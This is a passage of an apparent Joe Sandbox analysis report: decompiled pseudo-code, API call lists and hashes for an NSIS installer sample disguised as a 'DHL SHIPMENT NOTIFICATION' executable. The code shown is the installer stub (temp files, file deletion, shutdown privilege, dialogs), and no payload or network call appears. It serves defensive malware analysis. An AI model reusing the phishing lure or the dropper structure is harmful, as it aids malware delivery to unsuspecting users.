                        											goto L68;
                        										}
                        										goto L40;
                        									}
                        									goto L31;
                        								}
                        								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
                        								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
                        									goto L29;
                        								}
                        								_t177 =  *((intOrPtr*)(_t198 + 8));
                        								__eflags = _t177 - 0x20;
                        								if(_t177 == 0x20) {
                        									L28:
                        									_t36 =  &_v20;
                        									 *_t36 = _v20 | 0x00000004;
                        									__eflags =  *_t36;
                        									goto L29;
                        								}
                        								__eflags = _t177 - _t188;
                        								if(_t177 != _t188) {
                        									goto L29;
                        								}
                        								goto L28;
                        							}
                        							_t178 =  *((intOrPtr*)(_t198 + 2));
                        							__eflags = _t178 - _t209;
                        							if(_t178 == _t209) {
                        								L23:
                        								 *0x7a8b40 = 1;
                        								goto L24;
                        							}
                        							__eflags = _t178 - _t188;
                        							if(_t178 != _t188) {
                        								goto L24;
                        							}
                        							goto L23;
                        						}
                        					} else {
                        						goto L16;
                        					}
                        					do {
                        						L16:
                        						_t198 = _t198 + 2;
                        						__eflags =  *_t198 - _t209;
                        					} while ( *_t198 == _t209);
                        					goto L17;
                        				}
                        				goto L37;
                        			}
                        0x00000000
                        0x00403bff
                        0x00403bf3
                        0x00403b8a
                        0x00403b91
                        0x00403b91
                        0x004039a7
                        0x00403a4e
                        0x00403a4e
                        0x00403a5a
                        0x00000000
                        0x00403a5a
                        0x004039b8
                        0x004039c0
                        0x00403a12
                        0x00403a12
                        0x00403a18
                        0x00403a1f
                        0x00403a6d
                        0x00403a6f
                        0x00403a74
                        0x00403a76
                        0x00403a7e
                        0x00403a7e
                        0x00403a89
                        0x00403a8e
                        0x00403a95
                        0x00403a9b
                        0x00403a9d
                        0x00403b70
                        0x00403b70
                        0x00403b70
                        0x00000000
                        0x00403aa3
                        0x00403aa3
                        0x00403aa5
                        0x00403aa6
                        0x00403aaf
                        0x00403aa8
                        0x00403aa8
                        0x00403aa8
                        0x00403ab5
                        0x00403abd
                        0x00403ac4
                        0x00403acc
                        0x00403acc
                        0x00403ad9
                        0x00403ae5
                        0x00403aef
                        0x00403aef
                        0x00403af1
                        0x00403af8
                        0x00403b02
                        0x00403b0e
                        0x00403b14
                        0x00403b1a
                        0x00403b1d
                        0x00403b27
                        0x00403b2d
                        0x00403b2f
                        0x00403b33
                        0x00403b44
                        0x00403b4a
                        0x00403b4f
                        0x00403b51
                        0x00403b54
                        0x00403b5a
                        0x00403b5a
                        0x00403b51
                        0x00403b2f
                        0x00403b5d
                        0x00403b64
                        0x00403b64
                        0x00403b64
                        0x00403b64
                        0x00403b6b
                        0x00000000
                        0x00403b6b
                        0x00403a9d
                        0x00403a21
                        0x00403a24
                        0x00403a28
                        0x00403a2d
                        0x00403a2f
                        0x00000000
                        0x00000000
                        0x00403a3b
                        0x00403a46
                        0x00403a4b
                        0x00000000
                        0x00403a4b
                        0x004039c9
                        0x004039e1
                        0x004039f2
                        0x004039f3
                        0x004039f7
                        0x004039f9
                        0x00403a07
                        0x00403a0e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403a0e
                        0x00403a10
                        0x00000000
                        0x00403a10
                        0x00403933
                        0x0040393f
                        0x00403944
                        0x00403949
                        0x0040394b
                        0x00000000
                        0x00000000
                        0x00403953
                        0x0040395b
                        0x0040396c
                        0x00403974
                        0x00403976
                        0x0040397b
                        0x0040397d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040397d
                        0x00000000
                        0x004038da
                        0x00403883
                        0x00403885
                        0x00000000
                        0x00000000
                        0x00403887
                        0x0040388b
                        0x0040388f
                        0x00403896
                        0x00403896
                        0x00403896
                        0x00403896
                        0x00000000
                        0x00403896
                        0x00403891
                        0x00403894
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403894
                        0x0040382d
                        0x00403831
                        0x00403834
                        0x0040383b
                        0x0040383b
                        0x00000000
                        0x0040383b
                        0x00403836
                        0x00403839
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403839
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403807
                        0x00403807
                        0x00403808
                        0x00403809
                        0x00403809
                        0x00000000
                        0x00403807
                        0x00000000

                        APIs
                        • SetErrorMode.KERNELBASE(00008001), ref: 00403669
                        • GetVersionExW.KERNEL32(?), ref: 00403692
                        • GetVersionExW.KERNEL32(0000011C), ref: 004036A9
                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403740
                        • #17.COMCTL32(00000007,00000009,0000000B), ref: 0040377C
                        • OleInitialize.OLE32(00000000), ref: 00403783
                        • SHGetFileInfoW.SHELL32(0079FF48,00000000,?,000002B4,00000000), ref: 004037A1
                        • GetCommandLineW.KERNEL32(007A7AA0,NSIS Error), ref: 004037B6
                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe" ,00000020,"C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe" ,00000000), ref: 004037EF
                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403922
                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403933
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040393F
                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403953
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040395B
                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040396C
                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403974
                        • DeleteFileW.KERNELBASE(1033), ref: 00403988
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A6F
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A7E
                          • Part of subcall function 00405C1C: CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A89
                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe" ,00000000,?), ref: 00403A95
                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AB5
                        • DeleteFileW.KERNEL32(0079F748,0079F748,?,007A9000,?), ref: 00403B14
                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe,0079F748,00000001), ref: 00403B27
                        • CloseHandle.KERNEL32(00000000,0079F748,0079F748,?,0079F748,00000000), ref: 00403B54
                        • ExitProcess.KERNEL32(?), ref: 00403B72
                        • OleUninitialize.OLE32(?), ref: 00403B77
                        • ExitProcess.KERNEL32 ref: 00403B91
                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BA5
                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403BAC
                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BC0
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BDF
                        • ExitWindowsEx.USER32 ref: 00403C04
                        • ExitProcess.KERNEL32 ref: 00403C25
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                        • String ID: "C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                        • API String ID: 2292928366-499577634
                        • Opcode ID: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
                        • Instruction ID: 9002a92140da6a8b371a97510ecbbb4cdf1836846ed801e4a5207059f252ac0c
                        • Opcode Fuzzy Hash: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
                        • Instruction Fuzzy Hash: EAE13571A00214AAD720AFB58D45BAF7EB9EB45709F10843EF541B62D1DB7C8E41CB2D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 98%
                        			E00405D7A(void* __eflags, signed int _a4, signed int _a8) {
                        				signed int _v8;
                        				signed int _v12;
                        				short _v556;
                        				short _v558;
                        				struct _WIN32_FIND_DATAW _v604;
                        				signed int _t38;
                        				signed int _t52;
                        				signed int _t55;
                        				signed int _t62;
                        				void* _t64;
                        				signed char _t65;
                        				WCHAR* _t66;
                        				void* _t67;
                        				WCHAR* _t68;
                        				void* _t70;
                        
                        				_t65 = _a8;
                        				_t68 = _a4;
                        				_v8 = _t65 & 0x00000004;
                        				_t38 = E00406045(__eflags, _t68);
                        				_v12 = _t38;
                        				if((_t65 & 0x00000008) != 0) {
                        					_t62 = DeleteFileW(_t68); // executed
                        					asm("sbb eax, eax");
                        					_t64 =  ~_t62 + 1;
                        					 *0x7a8b28 =  *0x7a8b28 + _t64;
                        					return _t64;
                        				}
                        				_a4 = _t65;
                        				_t8 =  &_a4;
                        				 *_t8 = _a4 & 0x00000001;
                        				__eflags =  *_t8;
                        				if( *_t8 == 0) {
                        					L5:
                        					E0040666E(0x7a3f90, _t68);
                        					__eflags = _a4;
                        					if(_a4 == 0) {
                        						E00405F89(_t68);
                        					} else {
                        						lstrcatW(0x7a3f90, L"\\*.*");
                        					}
                        					__eflags =  *_t68;
                        					if( *_t68 != 0) {
                        						L10:
                        						lstrcatW(_t68, 0x40a014);
                        						L11:
                        						_t66 =  &(_t68[lstrlenW(_t68)]);
                        						_t38 = FindFirstFileW(0x7a3f90,  &_v604); // executed
                        						_t70 = _t38;
                        						__eflags = _t70 - 0xffffffff;
                        						if(_t70 == 0xffffffff) {
                        							L26:
                        							__eflags = _a4;
                        							if(_a4 != 0) {
                        								_t30 = _t66 - 2;
                        								 *_t30 =  *(_t66 - 2) & 0x00000000;
                        								__eflags =  *_t30;
                        							}
                        							goto L28;
                        						} else {
                        							goto L12;
                        						}
                        						do {
                        							L12:
                        							__eflags = _v604.cFileName - 0x2e;
                        							if(_v604.cFileName != 0x2e) {
                        								L16:
                        								E0040666E(_t66,  &(_v604.cFileName));
                        								__eflags = _v604.dwFileAttributes & 0x00000010;
                        								if(__eflags == 0) {
                        									_t52 = E00405D32(__eflags, _t68, _v8);
                        									__eflags = _t52;
                        									if(_t52 != 0) {
                        										E004056D0(0xfffffff2, _t68);
                        									} else {
                        										__eflags = _v8 - _t52;
                        										if(_v8 == _t52) {
                        											 *0x7a8b28 =  *0x7a8b28 + 1;
                        										} else {
                        											E004056D0(0xfffffff1, _t68);
                        											E0040642E(_t67, _t68, 0);
                        										}
                        									}
                        								} else {
                        									__eflags = (_a8 & 0x00000003) - 3;
                        									if(__eflags == 0) {
                        										E00405D7A(__eflags, _t68, _a8);
                        									}
                        								}
                        								goto L24;
                        							}
                        							__eflags = _v558;
                        							if(_v558 == 0) {
                        								goto L24;
                        							}
                        							__eflags = _v558 - 0x2e;
                        							if(_v558 != 0x2e) {
                        								goto L16;
                        							}
                        							__eflags = _v556;
                        							if(_v556 == 0) {
                        								goto L24;
                        							}
                        							goto L16;
                        							L24:
                        							_t55 = FindNextFileW(_t70,  &_v604); // executed
                        							__eflags = _t55;
                        						} while (_t55 != 0);
                        						_t38 = FindClose(_t70); // executed
                        						goto L26;
                        					}
                        					__eflags =  *0x7a3f90 - 0x5c;
                        					if( *0x7a3f90 != 0x5c) {
                        						goto L11;
                        					}
                        					goto L10;
                        				} else {
                        					__eflags = _t38;
                        					if(_t38 == 0) {
                        						L28:
                        						__eflags = _a4;
                        						if(_a4 == 0) {
                        							L36:
                        							return _t38;
                        						}
                        						__eflags = _v12;
                        						if(_v12 != 0) {
                        							_t38 = E004069A4(_t68);
                        							__eflags = _t38;
                        							if(_t38 == 0) {
                        								goto L36;
                        							}
                        							E00405F3D(_t68);
                        							_t38 = E00405D32(__eflags, _t68, _v8 | 0x00000001);
                        							__eflags = _t38;
                        							if(_t38 != 0) {
                        								return E004056D0(0xffffffe5, _t68);
                        							}
                        							__eflags = _v8;
                        							if(_v8 == 0) {
                        								goto L30;
                        							}
                        							E004056D0(0xfffffff1, _t68);
                        							return E0040642E(_t67, _t68, 0);
                        						}
                        						L30:
                        						 *0x7a8b28 =  *0x7a8b28 + 1;
                        						return _t38;
                        					}
                        					__eflags = _t65 & 0x00000002;
                        					if((_t65 & 0x00000002) == 0) {
                        						goto L28;
                        					}
                        					goto L5;
                        				}
                        			}



















                        APIs
                        • DeleteFileW.KERNELBASE(?,?,76CDFAA0,76CDF560,00000000), ref: 00405DA3
                        • lstrcatW.KERNEL32(007A3F90,\*.*), ref: 00405DEB
                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405E0E
                        • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F90,?,?,76CDFAA0,76CDF560,00000000), ref: 00405E14
                        • FindFirstFileW.KERNELBASE(007A3F90,?,?,?,0040A014,?,007A3F90,?,?,76CDFAA0,76CDF560,00000000), ref: 00405E24
                        • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EC4
                        • FindClose.KERNELBASE(00000000), ref: 00405ED3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                        • String ID: .$.$\*.*
                        • API String ID: 2035342205-3749113046
                        • Opcode ID: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
                        • Instruction ID: b1f38bcf7b39c15e0faf9db06640fc0f7a2e3671fe4bba31c24ee78ec55d2bca
                        • Opcode Fuzzy Hash: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
                        • Instruction Fuzzy Hash: 5541E230800A15AADB21AB61CC49ABF7678DF42714F20813FF845B11D1EB7C4E91DEAE
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004069A4(WCHAR* _a4) {
                        				void* _t2;
                        
                        				_t2 = FindFirstFileW(_a4, 0x7a4fd8); // executed
                        				if(_t2 == 0xffffffff) {
                        					return 0;
                        				}
                        				FindClose(_t2);
                        				return 0x7a4fd8;
                        			}

                        APIs
                        • FindFirstFileW.KERNELBASE(76CDFAA0,007A4FD8,007A4790,0040608E,007A4790,007A4790,00000000,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560), ref: 004069AF
                        • FindClose.KERNEL32(00000000), ref: 004069BB
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Find$CloseFileFirst
                        • String ID:
                        • API String ID: 2295610775-0
                        • Opcode ID: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
                        • Instruction ID: 60c22f5c8fe31c667ed350a31965a044de81702d272a45ebe5fc25ec47674b4c
                        • Opcode Fuzzy Hash: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
                        • Instruction Fuzzy Hash: 47D012F15191205FCB4017786E0C84B7A589F573313264B36B0A6F55E0D6748C3787AC
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 84%
                        			E004040CB(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                        				struct HWND__* _v28;
                        				void* _v84;
                        				void* _v88;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t34;
                        				signed int _t36;
                        				signed int _t38;
                        				struct HWND__* _t48;
                        				signed int _t67;
                        				struct HWND__* _t73;
                        				signed int _t86;
                        				struct HWND__* _t91;
                        				signed int _t99;
                        				int _t103;
                        				signed int _t117;
                        				int _t118;
                        				int _t122;
                        				signed int _t124;
                        				struct HWND__* _t127;
                        				struct HWND__* _t128;
                        				int _t129;
                        				intOrPtr _t130;
                        				long _t133;
                        				int _t135;
                        				int _t136;
                        				void* _t137;
                        
                        				_t130 = _a8;
                        				if(_t130 == 0x110 || _t130 == 0x408) {
                        					_t34 = _a12;
                        					_t127 = _a4;
                        					__eflags = _t130 - 0x110;
                        					 *0x7a1f70 = _t34;
                        					if(_t130 == 0x110) {
                        						 *0x7a8aa8 = _t127;
                        						 *0x7a1f84 = GetDlgItem(_t127, 1);
                        						_t91 = GetDlgItem(_t127, 2);
                        						_push(0xffffffff);
                        						_push(0x1c);
                        						 *0x79ff50 = _t91;
                        						E004045CA(_t127);
                        						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a88); // executed
                        						 *0x7a7a6c = E0040140B(4);
                        						_t34 = 1;
                        						__eflags = 1;
                        						 *0x7a1f70 = 1;
                        					}
                        					_t124 =  *0x40a39c; // 0x0
                        					_t136 = 0;
                        					_t133 = (_t124 << 6) +  *0x7a8ac0;
                        					__eflags = _t124;
                        					if(_t124 < 0) {
                        						L36:
                        						E00404616(0x40b);
                        						while(1) {
                        							_t36 =  *0x7a1f70;
                        							 *0x40a39c =  *0x40a39c + _t36;
                        							_t133 = _t133 + (_t36 << 6);
                        							_t38 =  *0x40a39c; // 0x0
                        							__eflags = _t38 -  *0x7a8ac4;
                        							if(_t38 ==  *0x7a8ac4) {
                        								E0040140B(1);
                        							}
                        							__eflags =  *0x7a7a6c - _t136;
                        							if( *0x7a7a6c != _t136) {
                        								break;
                        							}
                        							__eflags =  *0x40a39c -  *0x7a8ac4; // 0x0
                        							if(__eflags >= 0) {
                        								break;
                        							}
                        							_t117 =  *(_t133 + 0x14);
                        							E004066AB(_t117, _t127, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
                        							_push( *((intOrPtr*)(_t133 + 0x20)));
                        							_push(0xfffffc19);
                        							E004045CA(_t127);
                        							_push( *((intOrPtr*)(_t133 + 0x1c)));
                        							_push(0xfffffc1b);
                        							E004045CA(_t127);
                        							_push( *((intOrPtr*)(_t133 + 0x28)));
                        							_push(0xfffffc1a);
                        							E004045CA(_t127);
                        							_t48 = GetDlgItem(_t127, 3);
                        							__eflags =  *0x7a8b2c - _t136;
                        							_v28 = _t48;
                        							if( *0x7a8b2c != _t136) {
                        								_t117 = _t117 & 0x0000fefd | 0x00000004;
                        								__eflags = _t117;
                        							}
                        							ShowWindow(_t48, _t117 & 0x00000008);
                        							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                        							E004045EC(_t117 & 0x00000002);
                        							_t118 = _t117 & 0x00000004;
                        							EnableWindow( *0x79ff50, _t118);
                        							__eflags = _t118 - _t136;
                        							if(_t118 == _t136) {
                        								_push(1);
                        							} else {
                        								_push(_t136);
                        							}
                        							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                        							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                        							__eflags =  *0x7a8b2c - _t136;
                        							if( *0x7a8b2c == _t136) {
                        								_push( *0x7a1f84);
                        							} else {
                        								SendMessageW(_t127, 0x401, 2, _t136);
                        								_push( *0x79ff50);
                        							}
                        							E004045FF();
                        							E0040666E(0x7a1f88, E004040AC());
                        							E004066AB(0x7a1f88, _t127, _t133,  &(0x7a1f88[lstrlenW(0x7a1f88)]),  *((intOrPtr*)(_t133 + 0x18)));
                        							SetWindowTextW(_t127, 0x7a1f88);
                        							_push(_t136);
                        							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                        							__eflags = _t67;
                        							if(_t67 != 0) {
                        								continue;
                        							} else {
                        								__eflags =  *_t133 - _t136;
                        								if( *_t133 == _t136) {
                        									continue;
                        								}
                        								__eflags =  *(_t133 + 4) - 5;
                        								if( *(_t133 + 4) != 5) {
                        									DestroyWindow( *0x7a7a78);
                        									 *0x7a0f60 = _t133;
                        									__eflags =  *_t133 - _t136;
                        									if( *_t133 <= _t136) {
                        										goto L60;
                        									}
                        									_t73 = CreateDialogParamW( *0x7a8aa0,  *_t133 +  *0x7a7a80 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
                        									__eflags = _t73 - _t136;
                        									 *0x7a7a78 = _t73;
                        									if(_t73 == _t136) {
                        										goto L60;
                        									}
                        									_push( *((intOrPtr*)(_t133 + 0x2c)));
                        									_push(6);
                        									E004045CA(_t73);
                        									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                        									ScreenToClient(_t127, _t137 + 0x10);
                        									SetWindowPos( *0x7a7a78, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                        									_push(_t136);
                        									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                        									__eflags =  *0x7a7a6c - _t136;
                        									if( *0x7a7a6c != _t136) {
                        										goto L63;
                        									}
                        									ShowWindow( *0x7a7a78, 8);
                        									E00404616(0x405);
                        									goto L60;
                        								}
                        								__eflags =  *0x7a8b2c - _t136;
                        								if( *0x7a8b2c != _t136) {
                        									goto L63;
                        								}
                        								__eflags =  *0x7a8b20 - _t136;
                        								if( *0x7a8b20 != _t136) {
                        									continue;
                        								}
                        								goto L63;
                        							}
                        						}
                        						DestroyWindow( *0x7a7a78); // executed
                        						 *0x7a8aa8 = _t136;
                        						EndDialog(_t127,  *0x7a0758); // executed
                        						goto L60;
                        					} else {
                        						__eflags = _t34 - 1;
                        						if(_t34 != 1) {
                        							L35:
                        							__eflags =  *_t133 - _t136;
                        							if( *_t133 == _t136) {
                        								goto L63;
                        							}
                        							goto L36;
                        						}
                        						_push(0);
                        						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                        						__eflags = _t86;
                        						if(_t86 == 0) {
                        							goto L35;
                        						}
                        						SendMessageW( *0x7a7a78, 0x40f, 0, 1);
                        						__eflags =  *0x7a7a6c;
                        						return 0 |  *0x7a7a6c == 0x00000000;
                        					}
                        				} else {
                        					_t127 = _a4;
                        					_t136 = 0;
                        					if(_t130 == 0x47) {
                        						SetWindowPos( *0x7a1f68, _t127, 0, 0, 0, 0, 0x13);
                        					}
                        					_t122 = _a12;
                        					if(_t130 != 5) {
                        						L8:
                        						if(_t130 != 0x40d) {
                        							__eflags = _t130 - 0x11;
                        							if(_t130 != 0x11) {
                        								__eflags = _t130 - 0x111;
                        								if(_t130 != 0x111) {
                        									goto L28;
                        								}
                        								_t135 = _t122 & 0x0000ffff;
                        								_t128 = GetDlgItem(_t127, _t135);
                        								__eflags = _t128 - _t136;
                        								if(_t128 == _t136) {
                        									L15:
                        									__eflags = _t135 - 1;
                        									if(_t135 != 1) {
                        										__eflags = _t135 - 3;
                        										if(_t135 != 3) {
                        											_t129 = 2;
                        											__eflags = _t135 - _t129;
                        											if(_t135 != _t129) {
                        												L27:
                        												SendMessageW( *0x7a7a78, 0x111, _t122, _a16);
                        												goto L28;
                        											}
                        											__eflags =  *0x7a8b2c - _t136;
                        											if( *0x7a8b2c == _t136) {
                        												_t99 = E0040140B(3);
                        												__eflags = _t99;
                        												if(_t99 != 0) {
                        													goto L28;
                        												}
                        												 *0x7a0758 = 1;
                        												L23:
                        												_push(0x78);
                        												L24:
                        												E004045A3();
                        												goto L28;
                        											}
                        											E0040140B(_t129);
                        											 *0x7a0758 = _t129;
                        											goto L23;
                        										}
                        										__eflags =  *0x40a39c - _t136; // 0x0
                        										if(__eflags <= 0) {
                        											goto L27;
                        										}
                        										_push(0xffffffff);
                        										goto L24;
                        									}
                        									_push(_t135);
                        									goto L24;
                        								}
                        								SendMessageW(_t128, 0xf3, _t136, _t136);
                        								_t103 = IsWindowEnabled(_t128);
                        								__eflags = _t103;
                        								if(_t103 == 0) {
                        									L63:
                        									return 0;
                        								}
                        								goto L15;
                        							}
                        							SetWindowLongW(_t127, _t136, _t136);
                        							return 1;
                        						}
                        						DestroyWindow( *0x7a7a78);
                        						 *0x7a7a78 = _t122;
                        						L60:
                        						if( *0x7a3f88 == _t136 &&  *0x7a7a78 != _t136) {
                        							ShowWindow(_t127, 0xa);
                        							 *0x7a3f88 = 1;
                        						}
                        						goto L63;
                        					} else {
                        						asm("sbb eax, eax");
                        						ShowWindow( *0x7a1f68,  ~(_t122 - 1) & 0x00000005);
                        						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                        							L28:
                        							return E00404631(_a8, _t122, _a16);
                        						} else {
                        							ShowWindow(_t127, 4);
                        							goto L8;
                        						}
                        					}
                        				}
                        			}

                        APIs
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404107
                        • ShowWindow.USER32(?), ref: 00404127
                        • GetWindowLongW.USER32(?,000000F0), ref: 00404139
                        • ShowWindow.USER32(?,00000004), ref: 00404152
                        • DestroyWindow.USER32 ref: 00404166
                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040417F
                        • GetDlgItem.USER32 ref: 0040419E
                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041B2
                        • IsWindowEnabled.USER32(00000000), ref: 004041B9
                        • GetDlgItem.USER32 ref: 00404264
                        • GetDlgItem.USER32 ref: 0040426E
                        • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404288
                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D9
                        • GetDlgItem.USER32 ref: 0040437F
                        • ShowWindow.USER32(00000000,?), ref: 004043A0
                        • EnableWindow.USER32(?,?), ref: 004043B2
                        • EnableWindow.USER32(?,?), ref: 004043CD
                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043E3
                        • EnableMenuItem.USER32 ref: 004043EA
                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404402
                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404415
                        • lstrlenW.KERNEL32(007A1F88,?,007A1F88,00000000), ref: 0040443F
